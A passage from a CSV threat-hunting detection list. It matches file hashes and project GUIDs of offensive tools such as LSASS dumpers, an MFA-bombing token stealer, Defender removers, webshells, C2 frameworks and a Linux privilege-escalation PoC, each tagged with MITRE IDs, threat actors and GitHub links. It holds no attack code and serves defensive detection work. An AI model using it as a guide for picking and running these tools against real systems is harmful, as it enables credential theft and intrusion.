- TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","39932" 
"*d83e80b7ad4adae59ae0257237f4efcbefa94117edfc36955311c14115a2461b*",".{0,1000}d83e80b7ad4adae59ae0257237f4efcbefa94117edfc36955311c14115a2461b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39933" "*d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53*",".{0,1000}d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39937" "*d8512753450da47e16944a61c468294e7a2617f244bbe6595fedf0249af0bba3*",".{0,1000}d8512753450da47e16944a61c468294e7a2617f244bbe6595fedf0249af0bba3.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","39939" "*d854d2be5826183cb7c1317e3d920871fd467d5506b70e3c5147599ca2704ee6*",".{0,1000}d854d2be5826183cb7c1317e3d920871fd467d5506b70e3c5147599ca2704ee6.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","39940" "*d857b8d24455c5c63414bdb7a7e6ccdc3a198421400f2b659591902e3babc93f*",".{0,1000}d857b8d24455c5c63414bdb7a7e6ccdc3a198421400f2b659591902e3babc93f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39941" "*d8580cfe02f5f7682e56daf8776a4394c199fa8018c51b8eed3f2c3a60c5edec*",".{0,1000}d8580cfe02f5f7682e56daf8776a4394c199fa8018c51b8eed3f2c3a60c5edec.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39942" "*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39943" "*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39944" "*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39945" "*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39946" "*d85882904decb15b9b4cf1000a05dfe8694a8d4c74a606a6df2b0cb06937f038*",".{0,1000}d85882904decb15b9b4cf1000a05dfe8694a8d4c74a606a6df2b0cb06937f038.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - 
T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39947" "*d8588b3dfe75180aa8cff97c6d3cc9dc89da64a3acbb826742939869bca92b69*",".{0,1000}d8588b3dfe75180aa8cff97c6d3cc9dc89da64a3acbb826742939869bca92b69.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39948" "*d859332c8e766329669e274b93ecd7ab6f1acfb00a285e32c2545bb0234c0e18*",".{0,1000}d859332c8e766329669e274b93ecd7ab6f1acfb00a285e32c2545bb0234c0e18.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39949" "*d85ebff4e801e52ef86698933ccc7d66adc5e1aae2b0a8433be591fa31046436*",".{0,1000}d85ebff4e801e52ef86698933ccc7d66adc5e1aae2b0a8433be591fa31046436.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","39950" 
"*d860326bffbb645fcd78d65712b1950af17e47fdeab96e6dfa0a061a0723e570*",".{0,1000}d860326bffbb645fcd78d65712b1950af17e47fdeab96e6dfa0a061a0723e570.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","39951" "*d861f9c6114dd6d6e8227ec4fbb0f76318a36a384842eb76b5c3131a35b5c513*",".{0,1000}d861f9c6114dd6d6e8227ec4fbb0f76318a36a384842eb76b5c3131a35b5c513.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39952" "*d86bebcde6d5835cd2237d4e37df9858102002a4b9211aa3827e4bec0eca9897*",".{0,1000}d86bebcde6d5835cd2237d4e37df9858102002a4b9211aa3827e4bec0eca9897.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. 
It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","0","#filehash","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","39953" "*d876e3d39079bc0dbe6c171c3354b894f1c1f439ea80e335c401f19792efe064*",".{0,1000}d876e3d39079bc0dbe6c171c3354b894f1c1f439ea80e335c401f19792efe064.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39956" "*d8794a5b30966e2a66827976cbba7a251746c832d27236fc832bd4d309b1ddb6*",".{0,1000}d8794a5b30966e2a66827976cbba7a251746c832d27236fc832bd4d309b1ddb6.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39957" "*d87a4da0ba80cee6c60be1a1ebc2c138a79682ca7ad2ef8b91c2035e9a7ecd40*",".{0,1000}d87a4da0ba80cee6c60be1a1ebc2c138a79682ca7ad2ef8b91c2035e9a7ecd40.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","39958" "*d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e*",".{0,1000}d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39959" "*d886eb849d99a52449eb869bdf954644c2d5259db29be9cc757084bf166c42e0*",".{0,1000}d886eb849d99a52449eb869bdf954644c2d5259db29be9cc757084bf166c42e0.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","#filehash","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","39961" "*d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009*",".{0,1000}d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39962" "*d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e*",".{0,1000}d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39963" "*d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36*",".{0,1000}d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39965" "*d89d673d364fe861ce88027d3cd7598d64b2bd68f5b3b1e85bcca27b091de5b6*",".{0,1000}d89d673d364fe861ce88027d3cd7598d64b2bd68f5b3b1e85bcca27b091de5b6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39966" "*d8a298d200fa2b2641c5b610b5aba16940c0d0c8c47eada2531a77b751213b1d*",".{0,1000}d8a298d200fa2b2641c5b610b5aba16940c0d0c8c47eada2531a77b751213b1d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39967" "*D8A76296-A666-46C7-9CA0-254BA97E3B7C*",".{0,1000}D8A76296\-A666\-46C7\-9CA0\-254BA97E3B7C.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#GUIDproject","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","39968" "*D8B2F4F4-2B59-4457-B710-F15844570997*",".{0,1000}D8B2F4F4\-2B59\-4457\-B710\-F15844570997.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - 
T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","39970" "*D8BDABF6-6A96-4B48-8C1C-B6E78CBBF50E*",".{0,1000}D8BDABF6\-6A96\-4B48\-8C1C\-B6E78CBBF50E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","39971" "*d8c71995027b18f8664c982594ffcaf24beea40b58877aad962c239f2849863d*",".{0,1000}d8c71995027b18f8664c982594ffcaf24beea40b58877aad962c239f2849863d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39972" "*d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77*",".{0,1000}d8dd09b01eb4e363d88ff53c0aace04c39dbea822b7adba7a883970abbf72a77.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#filehash #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","39975" 
"*d8e73a53beb2ef23df43e85a336b235db7dfb075c03aa13534a9881d25c887d5*",".{0,1000}d8e73a53beb2ef23df43e85a336b235db7dfb075c03aa13534a9881d25c887d5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39977" "*d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118*",".{0,1000}d8edc288ad36a1dc853851dfe2255647e17020a528f64ca22b07258f3c918118.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39978" "*D8FC3807-CEAA-4F6A-9C8F-CC96F99D1F04*",".{0,1000}D8FC3807\-CEAA\-4F6A\-9C8F\-CC96F99D1F04.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","39979" 
"*d901c1e7b3825ddc88e962d4cf7846e86041b7374c853e8592934857992e1e8b*",".{0,1000}d901c1e7b3825ddc88e962d4cf7846e86041b7374c853e8592934857992e1e8b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39981" "*d906be8835b28606430351e62d19d007371cceddd480522ab2469695772fca60*",".{0,1000}d906be8835b28606430351e62d19d007371cceddd480522ab2469695772fca60.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39983" "*d907d7686b725441db1deb645a7079ca79f4dd1d8a18ca4b2bb98c12622603ef*",".{0,1000}d907d7686b725441db1deb645a7079ca79f4dd1d8a18ca4b2bb98c12622603ef.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#filehash","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","39984" "*d90ebaede19390d74f136a83ea5c391f1b550322295c22d5427d62c2d573c197*",".{0,1000}d90ebaede19390d74f136a83ea5c391f1b550322295c22d5427d62c2d573c197.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","39986" "*D90EFC93-2F8B-4427-B967-0E78ED45611E*",".{0,1000}D90EFC93\-2F8B\-4427\-B967\-0E78ED45611E.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","#GUIDproject","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","39987" "*d90f7aa9599ba9ec2b9d356db62aed30fad6daf4df8075de7b2bb7c585fce67c*",".{0,1000}d90f7aa9599ba9ec2b9d356db62aed30fad6daf4df8075de7b2bb7c585fce67c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39988" "*d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392*",".{0,1000}d9137008fdb0e917c996162abb1b6d457b20c987958d4a5e496edc9666fa8392.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39990" "*d914afd1408ddbf0aa5180434bb1713748af7d4936724b392a0a2e0307ed9dab*",".{0,1000}d914afd1408ddbf0aa5180434bb1713748af7d4936724b392a0a2e0307ed9dab.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39991" "*d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba*",".{0,1000}d919b4832a03cd1cc4c40803238e172dc2edd74317967546c4e485de14ddc5ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39992" "*d9220ac56637a1596427cce73d29ad64dec4669bd600d3c41effc512d15c3b6b*",".{0,1000}d9220ac56637a1596427cce73d29ad64dec4669bd600d3c41effc512d15c3b6b.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","39993" "*d92aeb275dc177206baa4ac355fa43c13bd53d309247b61a7fa563a062f15ecd*",".{0,1000}d92aeb275dc177206baa4ac355fa43c13bd53d309247b61a7fa563a062f15ecd.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39994" "*d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7*",".{0,1000}d92b4a40c783bf64d9117a9daf35b4f75426f7f1743d9939d756b327f608eda7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
